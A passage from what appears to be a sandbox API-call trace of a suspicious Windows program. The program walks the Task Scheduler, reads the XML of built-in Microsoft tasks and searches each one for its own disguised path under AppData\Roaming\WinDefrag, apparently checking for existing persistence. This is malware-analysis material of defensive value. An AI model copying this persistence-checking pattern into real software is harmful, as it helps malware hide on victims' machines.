true\r\n false\r\n false\r\n PT0S\r\n true\r\n 5\r\n true\r\n \r\n \r\n \r\n S-1-5-4\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n {855fec53-d2e4-4999-9e87-3414e9cf0ff4}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.890] IUnknown:Release (This=0x328240) returned 0x0 [0169.890] IUnknown:Release (This=0x3280f0) returned 0x0 [0169.890] ITaskFolder:GetFolders (in: This=0x328050, flags=0, ppFolders=0x18e228 | out: ppFolders=0x18e228*=0x3280f0) returned 0x0 [0169.892] ITaskFolderCollection:get_Count (in: This=0x3280f0, pCount=0x18e3a8 | out: pCount=0x18e3a8*=0) returned 0x0 [0169.892] IUnknown:Release (This=0x3280f0) returned 0x0 [0169.892] TaskScheduler:IUnknown:Release (This=0x328050) returned 0x0 [0169.892] ITaskFolderCollection:get_Item (in: This=0x326bd0, index=0x18e400*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x23, varVal2=0x0), ppFolder=0x18e3b0 | out: ppFolder=0x18e3b0*=0x328050) returned 0x0 [0169.892] ITaskFolder:GetTasks (in: This=0x328050, flags=1, ppTasks=0x18e240 | out: ppTasks=0x18e240*=0x3280e0) returned 0x0 [0169.894] IRegisteredTaskCollection:get_Count (in: This=0x3280e0, pCount=0x18e390 | out: pCount=0x18e390*=2) returned 0x0 [0169.894] IRegisteredTaskCollection:get_Item (in: This=0x3280e0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328230) returned 0x0 [0169.894] IRegisteredTask:get_Name (in: This=0x328230, pName=0x18e230 | out: pName=0x18e230*="IpAddressConflict1") returned 0x0 [0169.895] IRegisteredTask:get_Xml (in: This=0x328230, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n \\Microsoft\\Windows\\Tcpip\\IpAddressConflict1\r\n 2006-02-23T15:00:57\r\n $(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10000)\r\n $(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10002)\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Tcpip'] and EventID=4198]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n true\r\n false\r\n false\r\n false\r\n 7\r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n ndfapi.dll,NdfRunDllDuplicateIPOffendingSystem\r\n \r\n \r\n") returned 0x0 [0169.898] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\Tcpip\\IpAddressConflict1\r\n 2006-02-23T15:00:57\r\n $(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10000)\r\n $(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10002)\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Tcpip'] and EventID=4198]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n true\r\n false\r\n false\r\n false\r\n 7\r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n ndfapi.dll,NdfRunDllDuplicateIPOffendingSystem\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.898] IUnknown:Release (This=0x328230) returned 0x0 [0169.898] IRegisteredTaskCollection:get_Item (in: This=0x3280e0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328230) returned 0x0 [0169.898] IRegisteredTask:get_Name (in: This=0x328230, pName=0x18e230 | out: pName=0x18e230*="IpAddressConflict2") returned 0x0 [0169.898] IRegisteredTask:get_Xml (in: This=0x328230, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n \\Microsoft\\Windows\\Tcpip\\IpAddressConflict2\r\n 2006-02-23T15:00:57\r\n $(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10000)\r\n $(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10002)\r\n \r\n \r\n \r\n 2006-02-23T16:27:43\r\n true\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Tcpip'] and EventID=4199]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n true\r\n false\r\n false\r\n false\r\n 7\r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n ndfapi.dll,NdfRunDllDuplicateIPDefendingSystem\r\n \r\n \r\n") returned 0x0 [0169.901] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\Tcpip\\IpAddressConflict2\r\n 2006-02-23T15:00:57\r\n $(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10000)\r\n $(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10002)\r\n \r\n \r\n \r\n 2006-02-23T16:27:43\r\n true\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Tcpip'] and EventID=4199]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n true\r\n false\r\n false\r\n false\r\n 7\r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n ndfapi.dll,NdfRunDllDuplicateIPDefendingSystem\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.901] IUnknown:Release (This=0x328230) returned 0x0 [0169.901] IUnknown:Release (This=0x3280e0) returned 0x0 [0169.901] ITaskFolder:GetFolders (in: This=0x328050, flags=0, ppFolders=0x18e228 | out: ppFolders=0x18e228*=0x3280e0) returned 0x0 [0169.902] ITaskFolderCollection:get_Count (in: This=0x3280e0, pCount=0x18e3a8 | out: pCount=0x18e3a8*=0) returned 0x0 [0169.902] IUnknown:Release (This=0x3280e0) returned 0x0 [0169.902] TaskScheduler:IUnknown:Release (This=0x328050) returned 0x0 [0169.902] ITaskFolderCollection:get_Item (in: This=0x326bd0, index=0x18e400*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x24, varVal2=0x0), ppFolder=0x18e3b0 | out: ppFolder=0x18e3b0*=0x328050) returned 0x0 [0169.903] ITaskFolder:GetTasks (in: This=0x328050, flags=1, ppTasks=0x18e240 | out: ppTasks=0x18e240*=0x328100) returned 0x0 [0169.904] IRegisteredTaskCollection:get_Count (in: This=0x328100, pCount=0x18e390 | out: pCount=0x18e390*=1) returned 0x0 [0169.904] IRegisteredTaskCollection:get_Item (in: This=0x328100, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328270) returned 0x0 [0169.904] IRegisteredTask:get_Name (in: This=0x328270, pName=0x18e230 | out: pName=0x18e230*="MsCtfMonitor") returned 0x0 [0169.904] IRegisteredTask:get_Xml (in: This=0x328270, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n $(@%systemRoot%\\system32\\MsCtfMonitor.dll,-1000)\r\n Microsoft\\Windows\\TextServicesFramework\\MsCtfMonitor\r\n $(@%systemRoot%\\system32\\MsCtfMonitor.dll,-1001)\r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n true\r\n true\r\n false\r\n false\r\n PT0S\r\n true\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n \r\n {01575cfe-9a55-4003-a5e1-f38d1ebdcbe1}\r\n \r\n \r\n") returned 0x0 [0169.908] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n $(@%systemRoot%\\system32\\MsCtfMonitor.dll,-1000)\r\n Microsoft\\Windows\\TextServicesFramework\\MsCtfMonitor\r\n $(@%systemRoot%\\system32\\MsCtfMonitor.dll,-1001)\r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n true\r\n true\r\n false\r\n false\r\n PT0S\r\n true\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n \r\n {01575cfe-9a55-4003-a5e1-f38d1ebdcbe1}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.908] IUnknown:Release (This=0x328270) returned 0x0 [0169.908] IUnknown:Release (This=0x328100) returned 0x0 [0169.908] ITaskFolder:GetFolders (in: This=0x328050, flags=0, ppFolders=0x18e228 | out: ppFolders=0x18e228*=0x328100) returned 0x0 [0169.909] ITaskFolderCollection:get_Count (in: This=0x328100, pCount=0x18e3a8 | out: pCount=0x18e3a8*=0) returned 0x0 [0169.909] IUnknown:Release (This=0x328100) returned 0x0 [0169.909] TaskScheduler:IUnknown:Release (This=0x328050) returned 0x0 [0169.909] ITaskFolderCollection:get_Item (in: This=0x326bd0, index=0x18e400*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x25, varVal2=0x0), ppFolder=0x18e3b0 | out: ppFolder=0x18e3b0*=0x328050) returned 0x0 [0169.909] ITaskFolder:GetTasks (in: This=0x328050, flags=1, ppTasks=0x18e240 | out: ppTasks=0x18e240*=0x328100) returned 0x0 [0169.911] IRegisteredTaskCollection:get_Count (in: This=0x328100, pCount=0x18e390 | out: pCount=0x18e390*=1) returned 0x0 [0169.911] IRegisteredTaskCollection:get_Item (in: This=0x328100, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328260) returned 0x0 [0169.912] IRegisteredTask:get_Name (in: This=0x328260, pName=0x18e230 | out: pName=0x18e230*="SynchronizeTime") returned 0x0 [0169.912] IRegisteredTask:get_Xml (in: This=0x328260, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n $(@%systemroot%\\system32\\w32time.dll,-200)\r\n $(@%systemroot%\\system32\\w32time.dll,-202)\r\n $(@%systemroot%\\system32\\w32time.dll,-201)\r\n Microsoft\\Windows\\Time Synchronization\\SynchronizeTime\r\n \r\n \r\n \r\n 2005-01-01T01:00:00\r\n true\r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n IgnoreNew\r\n false\r\n true\r\n true\r\n false\r\n true\r\n true\r\n false\r\n \r\n \r\n \r\n S-1-5-19\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\sc.exe\r\n start w32time task_started\r\n \r\n \r\n") returned 0x0 [0169.914] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\w32time.dll,-200)\r\n $(@%systemroot%\\system32\\w32time.dll,-202)\r\n $(@%systemroot%\\system32\\w32time.dll,-201)\r\n Microsoft\\Windows\\Time Synchronization\\SynchronizeTime\r\n \r\n \r\n \r\n 2005-01-01T01:00:00\r\n true\r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n IgnoreNew\r\n false\r\n true\r\n true\r\n false\r\n true\r\n true\r\n false\r\n \r\n \r\n \r\n S-1-5-19\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\sc.exe\r\n start w32time task_started\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.915] IUnknown:Release (This=0x328260) returned 0x0 [0169.915] IUnknown:Release (This=0x328100) returned 0x0 [0169.915] ITaskFolder:GetFolders (in: This=0x328050, flags=0, ppFolders=0x18e228 | out: ppFolders=0x18e228*=0x328100) returned 0x0 [0169.916] ITaskFolderCollection:get_Count (in: This=0x328100, pCount=0x18e3a8 | out: pCount=0x18e3a8*=0) returned 0x0 [0169.916] IUnknown:Release (This=0x328100) returned 0x0 [0169.916] TaskScheduler:IUnknown:Release (This=0x328050) returned 0x0 [0169.916] ITaskFolderCollection:get_Item (in: This=0x326bd0, index=0x18e400*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x26, varVal2=0x0), ppFolder=0x18e3b0 | out: ppFolder=0x18e3b0*=0x328050) returned 0x0 [0169.916] ITaskFolder:GetTasks (in: This=0x328050, flags=1, ppTasks=0x18e240 | out: ppTasks=0x18e240*=0x3280e0) returned 0x0 [0169.918] IRegisteredTaskCollection:get_Count (in: This=0x3280e0, pCount=0x18e390 | out: pCount=0x18e390*=1) returned 0x0 [0169.918] IRegisteredTaskCollection:get_Item (in: This=0x3280e0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328220) returned 0x0 [0169.918] IRegisteredTask:get_Name (in: This=0x328220, pName=0x18e230 | out: pName=0x18e230*="UPnPHostConfig") returned 0x0 [0169.918] IRegisteredTask:get_Xml (in: This=0x328220, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n $(@%systemroot%\\system32\\upnphost.dll,-215)\r\n $(@%systemroot%\\system32\\upnphost.dll,-216)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)\r\n Microsoft\\Windows\\UPnP\\UPnPHostConfig\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n \r\n \r\n \r\n sc.exe\r\n config upnphost start= auto\r\n \r\n \r\n") returned 0x0 [0169.921] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\upnphost.dll,-215)\r\n $(@%systemroot%\\system32\\upnphost.dll,-216)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)\r\n Microsoft\\Windows\\UPnP\\UPnPHostConfig\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n \r\n \r\n \r\n sc.exe\r\n config upnphost start= auto\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.921] IUnknown:Release (This=0x328220) returned 0x0 [0169.921] IUnknown:Release (This=0x3280e0) returned 0x0 [0169.921] ITaskFolder:GetFolders (in: This=0x328050, flags=0, ppFolders=0x18e228 | out: ppFolders=0x18e228*=0x3280e0) returned 0x0 [0169.922] ITaskFolderCollection:get_Count (in: This=0x3280e0, pCount=0x18e3a8 | out: pCount=0x18e3a8*=0) returned 0x0 [0169.922] IUnknown:Release (This=0x3280e0) returned 0x0 [0169.922] TaskScheduler:IUnknown:Release (This=0x328050) returned 0x0 [0169.922] ITaskFolderCollection:get_Item (in: This=0x326bd0, index=0x18e400*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x27, varVal2=0x0), ppFolder=0x18e3b0 | out: ppFolder=0x18e3b0*=0x328050) returned 0x0 [0169.922] ITaskFolder:GetTasks (in: This=0x328050, flags=1, ppTasks=0x18e240 | out: ppTasks=0x18e240*=0x328100) returned 0x0 [0169.924] IRegisteredTaskCollection:get_Count (in: This=0x328100, pCount=0x18e390 | out: pCount=0x18e390*=1) returned 0x0 [0169.924] IRegisteredTaskCollection:get_Item (in: This=0x328100, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328260) returned 0x0 [0169.924] IRegisteredTask:get_Name (in: This=0x328260, pName=0x18e230 | out: pName=0x18e230*="HiveUploadTask") returned 0x0 [0169.924] IRegisteredTask:get_Xml (in: This=0x328260, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n \\Microsoft\\Windows\\User Profile Service\\HiveUploadTask\r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\profsvc,-500)\r\n $(@%SystemRoot%\\system32\\profsvc,-500)\r\n $(@%SystemRoot%\\system32\\profsvc,-501)\r\n \r\n \r\n \r\n 2007-08-28T00:00:00\r\n PT1H\r\n \r\n PT12H\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n false\r\n true\r\n \r\n PT10M\r\n PT2H\r\n false\r\n false\r\n \r\n \r\n PT2M\r\n 3\r\n \r\n true\r\n true\r\n \r\n \r\n \r\n {BA677074-762C-444b-94C8-8C83F93F6605}\r\n \r\n \r\n") returned 0x0 [0169.927] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\User Profile Service\\HiveUploadTask\r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\profsvc,-500)\r\n $(@%SystemRoot%\\system32\\profsvc,-500)\r\n $(@%SystemRoot%\\system32\\profsvc,-501)\r\n \r\n \r\n \r\n 2007-08-28T00:00:00\r\n PT1H\r\n \r\n PT12H\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n false\r\n true\r\n \r\n PT10M\r\n PT2H\r\n false\r\n false\r\n \r\n \r\n PT2M\r\n 3\r\n \r\n true\r\n true\r\n \r\n \r\n \r\n {BA677074-762C-444b-94C8-8C83F93F6605}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.927] IUnknown:Release (This=0x328260) returned 0x0 [0169.927] IUnknown:Release (This=0x328100) returned 0x0 [0169.927] ITaskFolder:GetFolders (in: This=0x328050, flags=0, ppFolders=0x18e228 | out: ppFolders=0x18e228*=0x328100) returned 0x0 [0169.928] ITaskFolderCollection:get_Count (in: This=0x328100, pCount=0x18e3a8 | out: pCount=0x18e3a8*=0) returned 0x0 [0169.928] IUnknown:Release (This=0x328100) returned 0x0 [0169.928] TaskScheduler:IUnknown:Release (This=0x328050) returned 0x0 [0169.928] ITaskFolderCollection:get_Item (in: This=0x326bd0, index=0x18e400*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x28, varVal2=0x0), ppFolder=0x18e3b0 | out: ppFolder=0x18e3b0*=0x328050) returned 0x0 [0169.928] ITaskFolder:GetTasks (in: This=0x328050, flags=1, ppTasks=0x18e240 | out: ppTasks=0x18e240*=0x3280e0) returned 0x0 [0169.930] IRegisteredTaskCollection:get_Count (in: This=0x3280e0, pCount=0x18e390 | out: pCount=0x18e390*=1) returned 0x0 [0169.930] IRegisteredTaskCollection:get_Item (in: This=0x3280e0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328220) returned 0x0 [0169.930] IRegisteredTask:get_Name (in: This=0x328220, pName=0x18e230 | out: pName=0x18e230*="ResolutionHost") returned 0x0 [0169.930] IRegisteredTask:get_Xml (in: This=0x328220, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n $(@%systemroot%\\system32\\dps.dll,-600)\r\n 1.0\r\n $(@%systemroot%\\system32\\dps.dll,-601)\r\n Microsoft\\Windows\\WDI\\ResolutionHost\r\n $(@%systemroot%\\system32\\dps.dll,-602)\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)(A;;FRFX;;;S-1-5-80-2970612574-78537857-698502321-558674196-1451644582)\r\n \r\n \r\n true\r\n Parallel\r\n true\r\n false\r\n false\r\n PT0S\r\n true\r\n 10\r\n true\r\n \r\n \r\n \r\n S-1-5-4\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n {900be39d-6be8-461a-bc4d-b0fa71f5ecb1}\r\n \r\n \r\n") returned 0x0 [0169.933] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\dps.dll,-600)\r\n 1.0\r\n $(@%systemroot%\\system32\\dps.dll,-601)\r\n Microsoft\\Windows\\WDI\\ResolutionHost\r\n $(@%systemroot%\\system32\\dps.dll,-602)\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)(A;;FRFX;;;S-1-5-80-2970612574-78537857-698502321-558674196-1451644582)\r\n \r\n \r\n true\r\n Parallel\r\n true\r\n false\r\n false\r\n PT0S\r\n true\r\n 10\r\n true\r\n \r\n \r\n \r\n S-1-5-4\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n {900be39d-6be8-461a-bc4d-b0fa71f5ecb1}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.933] IUnknown:Release (This=0x328220) returned 0x0 [0169.933] IUnknown:Release (This=0x3280e0) returned 0x0 [0169.933] ITaskFolder:GetFolders (in: This=0x328050, flags=0, ppFolders=0x18e228 | out: ppFolders=0x18e228*=0x3280e0) returned 0x0 [0169.934] ITaskFolderCollection:get_Count (in: This=0x3280e0, pCount=0x18e3a8 | out: pCount=0x18e3a8*=0) returned 0x0 [0169.934] IUnknown:Release (This=0x3280e0) returned 0x0 [0169.934] TaskScheduler:IUnknown:Release (This=0x328050) returned 0x0 [0169.934] ITaskFolderCollection:get_Item (in: This=0x326bd0, index=0x18e400*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x29, varVal2=0x0), ppFolder=0x18e3b0 | out: ppFolder=0x18e3b0*=0x328050) returned 0x0 [0169.934] ITaskFolder:GetTasks (in: This=0x328050, flags=1, ppTasks=0x18e240 | out: ppTasks=0x18e240*=0x328100) returned 0x0 [0169.936] IRegisteredTaskCollection:get_Count (in: This=0x328100, pCount=0x18e390 | out: pCount=0x18e390*=1) returned 0x0 [0169.936] IRegisteredTaskCollection:get_Item (in: This=0x328100, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328270) returned 0x0 [0169.936] IRegisteredTask:get_Name (in: This=0x328270, pName=0x18e230 | out: pName=0x18e230*="QueueReporting") returned 0x0 [0169.936] IRegisteredTask:get_Xml (in: This=0x328270, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)\r\n \\Microsoft\\Windows\\Windows Error Reporting\\QueueReporting\r\n $(@%SystemRoot%\\system32\\wer.dll,-292)\r\n $(@%SystemRoot%\\system32\\wer.dll,-293)\r\n $(@%SystemRoot%\\system32\\wer.dll,-294)\r\n 1.0\r\n \r\n \r\n \r\n PT13M\r\n \r\n \r\n \r\n false\r\n true\r\n Parallel\r\n true\r\n false\r\n false\r\n true\r\n true\r\n 5\r\n \r\n false\r\n false\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\wermgr.exe\r\n -queuereporting\r\n \r\n \r\n") returned 0x0 [0169.939] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)\r\n \\Microsoft\\Windows\\Windows Error Reporting\\QueueReporting\r\n $(@%SystemRoot%\\system32\\wer.dll,-292)\r\n $(@%SystemRoot%\\system32\\wer.dll,-293)\r\n $(@%SystemRoot%\\system32\\wer.dll,-294)\r\n 1.0\r\n \r\n \r\n \r\n PT13M\r\n \r\n \r\n \r\n false\r\n true\r\n Parallel\r\n true\r\n false\r\n false\r\n true\r\n true\r\n 5\r\n \r\n false\r\n false\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\wermgr.exe\r\n -queuereporting\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.939] IUnknown:Release (This=0x328270) returned 0x0 [0169.939] IUnknown:Release (This=0x328100) returned 0x0 [0169.939] ITaskFolder:GetFolders (in: This=0x328050, flags=0, ppFolders=0x18e228 | out: ppFolders=0x18e228*=0x328100) returned 0x0 [0169.940] ITaskFolderCollection:get_Count (in: This=0x328100, pCount=0x18e3a8 | out: pCount=0x18e3a8*=0) returned 0x0 [0169.940] IUnknown:Release (This=0x328100) returned 0x0 [0169.940] TaskScheduler:IUnknown:Release (This=0x328050) returned 0x0 [0169.940] ITaskFolderCollection:get_Item (in: This=0x326bd0, index=0x18e400*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2a, varVal2=0x0), ppFolder=0x18e3b0 | out: ppFolder=0x18e3b0*=0x328050) returned 0x0 [0169.940] ITaskFolder:GetTasks (in: This=0x328050, flags=1, ppTasks=0x18e240 | out: ppTasks=0x18e240*=0x328110) returned 0x0 [0169.942] IRegisteredTaskCollection:get_Count (in: This=0x328110, pCount=0x18e390 | out: pCount=0x18e390*=1) returned 0x0 [0169.942] IRegisteredTaskCollection:get_Item (in: This=0x328110, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328280) returned 0x0 [0169.942] IRegisteredTask:get_Name (in: This=0x328280, pName=0x18e230 | out: pName=0x18e230*="BfeOnServiceStartTypeChange") returned 0x0 [0169.942] IRegisteredTask:get_Xml (in: This=0x328280, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n \\Microsoft\\Windows\\Windows Filtering Platform\\BfeOnServiceStartTypeChange\r\n $(@%SystemRoot%\\system32\\bfe.dll,-2001)\r\n $(@%SystemRoot%\\system32\\bfe.dll,-2002)\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*/System/Provider[@Name='Service Control Manager'] and */System/EventID='7040' and */EventData/Data[@Name='param4']='BFE'</Select></Query></QueryList>\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n false\r\n true\r\n false\r\n false\r\n 7\r\n Queue\r\n true\r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n bfe.dll,BfeOnServiceStartTypeChange\r\n \r\n \r\n") returned 0x0 [0169.945] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\Windows Filtering Platform\\BfeOnServiceStartTypeChange\r\n $(@%SystemRoot%\\system32\\bfe.dll,-2001)\r\n $(@%SystemRoot%\\system32\\bfe.dll,-2002)\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*/System/Provider[@Name='Service Control Manager'] and */System/EventID='7040' and */EventData/Data[@Name='param4']='BFE'</Select></Query></QueryList>\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n false\r\n true\r\n false\r\n false\r\n 7\r\n Queue\r\n true\r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n bfe.dll,BfeOnServiceStartTypeChange\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.945] IUnknown:Release (This=0x328280) returned 0x0 [0169.945] IUnknown:Release (This=0x328110) returned 0x0 [0169.945] ITaskFolder:GetFolders (in: This=0x328050, flags=0, ppFolders=0x18e228 | out: ppFolders=0x18e228*=0x328110) returned 0x0 [0169.946] ITaskFolderCollection:get_Count (in: This=0x328110, pCount=0x18e3a8 | out: pCount=0x18e3a8*=0) returned 0x0 [0169.946] IUnknown:Release (This=0x328110) returned 0x0 [0169.946] TaskScheduler:IUnknown:Release (This=0x328050) returned 0x0 [0169.946] ITaskFolderCollection:get_Item 